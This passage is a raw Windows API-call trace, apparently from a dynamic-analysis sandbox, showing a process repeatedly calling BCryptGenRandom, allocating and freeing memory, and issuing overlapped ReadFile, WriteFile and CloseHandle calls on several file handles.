[0157.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.335] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.335] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.335] free (_Block=0x3e305b8) [0157.335] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.335] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.336] free (_Block=0x1fa91d0) [0157.336] free (_Block=0x1fa2ed8) [0157.336] free (_Block=0x1fa90b8) [0157.336] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.337] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.780] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.781] CloseHandle (hObject=0x308) returned 1 [0157.781] free (_Block=0x3df0008) [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.831] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.832] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.832] free (_Block=0x3e305b8) [0157.832] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.832] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.832] free (_Block=0x1fa91d0) [0157.832] free (_Block=0x1fa2ed8) [0157.832] free (_Block=0x1fa90b8) [0157.832] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.834] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.856] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4a0e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.867] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.867] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.867] free (_Block=0x3e305b8) [0157.867] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.867] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.868] free (_Block=0x1fa91d0) [0157.868] free (_Block=0x1fa2ed8) [0157.868] free (_Block=0x1fa90b8) [0157.868] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.896] CloseHandle (hObject=0x3cc) returned 1 [0157.896] free (_Block=0x1ff1e60) [0157.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.904] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x29c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0157.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.943] CloseHandle (hObject=0x170) returned 1 [0157.943] free (_Block=0x3d70450) [0157.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.952] CloseHandle (hObject=0x3cc) returned 1 [0157.952] free (_Block=0x1ff1e60) [0157.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.963] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x9a90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0157.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.967] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xaabb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0158.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.271] CloseHandle (hObject=0x170) returned 1 [0158.272] free (_Block=0x3d70450) [0158.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.668] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0158.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.672] CloseHandle (hObject=0x3cc) returned 1 [0158.673] free (_Block=0x1ff1e60) [0158.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.684] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.684] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.684] free (_Block=0x3e305b8) [0158.684] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.684] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.685] free (_Block=0x1fa91d0) [0158.685] free (_Block=0x1fa2ed8) [0158.685] free (_Block=0x1fa90b8) [0158.685] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.686] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.699] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x20e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.701] CloseHandle (hObject=0x3cc) returned 1 [0158.701] free (_Block=0x3df0008) [0158.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.712] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.712] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.712] free (_Block=0x3e305b8) [0158.712] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.712] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.713] free (_Block=0x1fa91d0) [0158.713] free (_Block=0x1fa2ed8) [0158.713] free (_Block=0x1fa90b8) [0158.713] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.714] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.734] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x911a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.736] CloseHandle (hObject=0x3cc) returned 1 [0158.736] free (_Block=0x3df0008) [0158.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.747] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.747] free (_Block=0x3e305b8) [0158.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.747] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.747] free (_Block=0x1fa91d0) [0158.747] free (_Block=0x1fa2ed8) [0158.747] free (_Block=0x1fa90b8) [0158.747] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.749] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.762] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x81ab, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.763] CloseHandle (hObject=0x3cc) returned 1 [0158.763] free (_Block=0x3df0008) [0158.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.774] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.774] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.774] free (_Block=0x3e305b8) [0158.774] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.774] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.774] free (_Block=0x1fa91d0) [0158.774] free (_Block=0x1fa2ed8) [0158.774] free (_Block=0x1fa90b8) [0158.774] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.777] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.778] CloseHandle (hObject=0x3cc) returned 1 [0158.778] free (_Block=0x3df0008) [0158.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.789] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.789] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.789] free (_Block=0x3e305b8) [0158.789] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.789] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.789] free (_Block=0x1fa91d0) [0158.790] free (_Block=0x1fa2ed8) [0158.790] free (_Block=0x1fa90b8) [0158.790] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.794] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.795] CloseHandle (hObject=0x3cc) returned 1 [0158.795] free (_Block=0x3df0008) [0158.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, 